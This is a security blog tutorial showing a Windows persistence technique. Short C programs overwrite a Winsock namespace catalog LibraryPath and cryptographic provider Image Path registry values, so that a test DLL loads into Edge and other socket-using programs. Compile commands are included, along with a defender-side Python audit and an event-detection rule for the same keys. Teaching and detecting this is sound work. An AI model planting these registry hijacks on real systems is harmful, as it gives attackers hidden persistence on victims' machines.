
Hello, cybersecurity enthusiasts and white hackers!


This post came about in preparation for a workshop on malware persistence techniques that I teach at various conferences in Europe and Asia. It shows that interesting persistence methods can be found with Sysinternals Procmon and a few filters. This is a well-known and popular method; I just want to show it in practice. In my case, everything worked out thanks to one registry key that is used by many applications in the operating system, in particular Microsoft Edge:

"HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000007"

Apparently this registry path is used by all applications that work with sockets.

practical example

First of all, I just start with simple filters in Procmon, like this:


As a result we get many interesting records:


As you can see, we can replace different registry key values:


As an experiment I decided to replace one of these DLLs.

In C it looks like this:

#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  // CSP: Microsoft Strong Cryptographic Provider (RSA)
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider", 0, KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // overwrite the provider's Image Path value;
    // for REG_SZ, cbData must include the terminating NUL
    RegSetValueEx(hkey, "Image Path", 0, REG_SZ, (const BYTE*)dll, (DWORD)(strlen(dll) + 1));
    RegCloseKey(hkey);
  }
  return 0;
}

or another value:

#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  // CSP: Microsoft Enhanced RSA and AES Cryptographic Provider
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider", 0, KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // overwrite the provider's Image Path value;
    // for REG_SZ, cbData must include the terminating NUL
    RegSetValueEx(hkey, "Image Path", 0, REG_SZ, (const BYTE*)dll, (DWORD)(strlen(dll) + 1));
    RegCloseKey(hkey);
  }
  return 0;
}

It certainly worked:


But the caveat is that the entire operating system froze after this, and even the antivirus started to freeze.

So I decided to start a new search:


After a long search I found another interesting key and value in the registry:

reg query "HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000007" /s

and tried to replace it. For this, just update the LibraryPath value:

/*
 * pers.c
 * Microsoft Edge
 * persistence trick v1.0
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html
*/
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;
  // malicious DLL
  const char* dll = "Z:\\hack.dll";

  // Winsock namespace provider catalog entry found with Procmon
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "System\\CurrentControlSet\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5\\Catalog_Entries64\\000000000007", 0, KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update the LibraryPath value;
    // for REG_SZ, cbData must include the terminating NUL
    RegSetValueEx(hkey, "LibraryPath", 0, REG_SZ, (const BYTE*)dll, (DWORD)(strlen(dll) + 1));
    RegCloseKey(hkey);
  }
  return 0;
}

As you can see, the code is pretty simple as usual: it just sets the value via the RegSetValueEx function. In my case, hack.dll is just a meow-meow message box:

/*
 * hack.c
 * "malware" for Microsoft Edge
 * persistence trick
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/08/14/malware-pers-26.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule,  DWORD  nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    MessageBoxA(NULL, "Meow-meow!!", "=^..^=", MB_OK);
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;
}

demo

Let’s check everything in action.

Compile our meow-meow “malware” hack.c as a DLL:

x86_64-w64-mingw32-g++ -O2 -shared hack.c -o hack.dll -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


And compile persistence script:

x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


Then, run it on test victim’s machine (Windows 11 x64):

.\pers.exe

As you can see, the registry value is successfully updated. Note that we need administrative privileges to update this registry value.

Then, try to open Microsoft Edge:

To confirm the result of the experiment, we launch Process Hacker 2 and check the process's memory:

As you can see, hack.dll was loaded correctly. The same effect occurs for other Windows programs, even Procmon64.exe. I assume the behavior will be the same for anything that uses Windows sockets. To be honest, I don’t know what this particular registry parameter is used for, but it seems to have something to do with sockets.
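A defender-side companion to the technique above, added here as an example (it is not code from the original post or from the author's repository). It parses the text that reg query ... /s prints for the NameSpace_Catalog5 key and flags any LibraryPath that does not resolve under System32, where the Windows-shipped namespace providers live; it then applies the matching check to Sysmon-style registry value-set events (Event ID 13), which is the logged equivalent of the Procmon RegSetValue filter used interactively in the post. The reg query output and the events are constructed samples, and the expansion of %SystemRoot% to C:\Windows is an assumption for the offline check.

```python
"""Audit and detection helpers for the Winsock namespace provider catalog.

Added example, not part of the original post. Parses constructed `reg query`
output and constructed Sysmon-style events; nothing here touches a live registry.
"""
import re

# Registry subtree of the 64-bit Winsock namespace catalog (from the post).
CATALOG_KEY = (r"HKLM\System\CurrentControlSet\Services\WinSock2\Parameters"
               r"\NameSpace_Catalog5\Catalog_Entries64")

# Assumption: %SystemRoot% expands to C:\Windows on the audited host.
SYSTEM_ROOT = r"C:\Windows"

# Constructed sample of `reg query <CATALOG_KEY> /s` output. Display strings and
# entry numbers are illustrative, not copied from a real machine.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000001
    LibraryPath    REG_EXPAND_SZ    %SystemRoot%\system32\NLAapi.dll
    DisplayString    REG_SZ    Network Location Awareness Legacy (NLAv1) Namespace
    Enabled    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000002
    LibraryPath    REG_EXPAND_SZ    %SystemRoot%\System32\mswsock.dll
    DisplayString    REG_SZ    Tcpip
    Enabled    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000007
    LibraryPath    REG_SZ    Z:\hack.dll
    DisplayString    REG_SZ    Constructed provider entry
    Enabled    REG_DWORD    0x1
"""

# Constructed Sysmon-like records: Event ID 13 is RegistryEvent (value set).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\user\Desktop\pers.exe",
     "TargetObject": CATALOG_KEY + r"\000000000007\LibraryPath",
     "Details": r"Z:\hack.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Program Files\Example\updater.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetObject": "", "Details": ""},
]

# Any LibraryPath under either the 32-bit or 64-bit namespace catalog.
LIBPATH_WRITE = re.compile(
    r"\\WinSock2\\Parameters\\NameSpace_Catalog5\\Catalog_Entries(?:64)?\\\d+\\LibraryPath$",
    re.IGNORECASE)


def parse_reg_query(text):
    """Turn `reg query ... /s` text into {key: {value_name: (type, data)}}."""
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("HKEY_"):          # a new key starts each block
            current = line
            entries[current] = {}
        elif current is not None:
            # reg query separates name, type and data with runs of spaces
            parts = re.split(r"\s{2,}", line, maxsplit=2)
            if len(parts) == 3:
                name, vtype, data = parts
                entries[current][name] = (vtype, data)
    return entries


def expand_system_root(path):
    """Expand %SystemRoot% (case-insensitively) using the assumed value."""
    return re.sub(r"%SystemRoot%", lambda m: SYSTEM_ROOT, path, flags=re.IGNORECASE)


def audit_catalog(text):
    """Return (entry_number, LibraryPath) for providers not under System32."""
    allowed_dir = (SYSTEM_ROOT + r"\System32").lower()
    findings = []
    for key, values in parse_reg_query(text).items():
        if "LibraryPath" not in values:
            continue
        _vtype, data = values["LibraryPath"]
        full = expand_system_root(data)
        directory = full.rsplit("\\", 1)[0] if "\\" in full else ""
        if directory.lower() != allowed_dir:
            findings.append((key.rsplit("\\", 1)[1], data))
    return findings


def detect_libpath_writes(events):
    """Return (image, target, new_value) for every value-set on a LibraryPath."""
    return [(e["Image"], e["TargetObject"], e["Details"]) for e in events
            if e.get("EventID") == 13 and LIBPATH_WRITE.search(e.get("TargetObject", ""))]


if __name__ == "__main__":
    for entry, path in audit_catalog(SAMPLE_REG_QUERY):
        print(f"[audit] catalog entry {entry} loads {path} from outside System32")
    for image, target, value in detect_libpath_writes(SAMPLE_EVENTS):
        print(f"[event] {image} set {target} = {value}")
```

The audit is a baseline check worth running on golden images and periodically on endpoints: legitimate namespace providers are a short, stable list and all of them ship in System32, so a path on another volume or under a user profile is a strong signal. The event rule is the same idea applied in real time; writes to LibraryPath under this catalog are rare enough in normal operation that every one deserves a look at the writing process.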

So, everything worked as expected. Perfect! =^..^=

This PoC is how an attacker might use different Windows features like socket connections for running a “malicious” DLL.

I hope this post spreads awareness of this interesting persistence technique among blue teamers, and adds a weapon to the red teamers’ arsenal.

This is a practical case for educational purposes only.

Windows Sockets
Malware persistence - part 1. Registry run keys
source code in github

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine